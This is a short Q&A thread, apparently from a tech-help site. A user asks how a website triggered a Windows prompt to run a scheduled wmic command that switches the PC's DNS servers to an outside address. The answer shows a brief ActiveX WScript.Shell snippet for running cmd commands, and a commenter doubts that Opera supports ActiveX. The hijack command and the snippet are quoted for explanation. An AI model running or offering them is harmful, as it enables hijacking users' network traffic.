How a browser manages to execute a command in cmd?
5,007
Phishers may use Javascript like this:
var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);
It works only if you turn off the security features in your browser which will need to use ActiveX.
Related videos on Youtube
![Paul](https://i.stack.imgur.com/ZCbkS.jpg?s=256&g=1)
Author by
Paul
Updated on September 18, 2022Comments
-
Paul almost 2 years
Some time ago while visiting some web site in Opera 12.12 following Windows 7 UAC prompt appeared on screen:
C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")
Obviously, I declined it.
The method by which phishers attempted to get my data is pretty clear, but how they did manage to execute the command from browser?
-
Paul almost 10 yearsOops... Never knew that Opera is able to work with ActiveX. Thought that it works in IE only.
-
nixda almost 10 yearsWhat? ActiveX in Opera? As I understand this Opera help page, this isn't the case.